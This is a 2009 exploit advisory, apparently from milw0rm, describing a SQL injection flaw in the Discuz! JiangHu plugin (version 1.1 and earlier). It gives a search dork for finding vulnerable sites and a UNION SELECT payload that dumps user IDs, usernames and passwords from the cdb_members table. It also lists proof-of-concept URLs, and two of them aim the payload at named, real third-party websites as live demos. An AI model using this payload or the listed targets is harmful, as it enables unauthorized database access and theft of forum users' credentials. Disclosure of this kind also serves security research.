========================================================= Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability ========================================================= ========================[Author]========================= [+] Founded : ZhaoHuAn [+] Contact : ZhengXing[at]shandagames[dot]com [+] Blog : http://www.patching.net/zhaohuan/ [+] Date : Feb, 9th 2009 [+] Update : Sep, 1th 2009 ========================[Soft Info]====================== Software: Discuz! Plugin JiangHu Inn Version : 1.1 Vendor : http://www.discuz.com d0rk : inurl:forummission.php [-] Exploit: [+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- [-] SqlI PoC: [+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- [+] Demo Live: [-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- [-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- /---------------------------------------------www.zhaohuan.net-------------------------------------------------\ Greetz : Snda Security Team & Normal is boring - -! \--------------------------------------------------------------------------------------------------------------/ # milw0rm.com [2009-09-02]